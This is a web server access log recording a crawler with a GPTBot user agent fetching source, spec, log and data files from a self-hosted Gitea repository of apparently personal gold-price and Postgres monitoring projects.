"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12388] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12291] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 20889] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16610] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16609] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18605] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:17:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 14469] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" -[17/Feb/2026:17:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py?display=source" [Client 74.7.227.38] [Length 12854] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" -[17/Feb/2026:17:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12537] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:17:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" -[17/Feb/2026:17:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 17987] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12414] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16577] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" -[17/Feb/2026:17:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17363] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:17:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py?display=source" [Client 74.7.227.38] [Length 29285] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/my_database.db" -[17/Feb/2026:17:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll?display=rendered" [Client 74.7.227.38] [Length 10857] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11223] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_price_log.csv" -[17/Feb/2026:17:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:17:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv?display=rendered" [Client 74.7.227.38] [Length 11115] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" -[17/Feb/2026:17:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12278] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21435] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17575] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12348] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:17:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12511] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12420] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" -[17/Feb/2026:17:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12586] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" -[17/Feb/2026:17:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11449] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" -[17/Feb/2026:17:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12418] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18606] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:17:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21362] [Gzip 7.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" -[17/Feb/2026:17:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12373] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec?display=source" [Client 74.7.227.38] [Length 12310] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:17:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log?display=source" [Client 74.7.227.38] [Length 11477] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 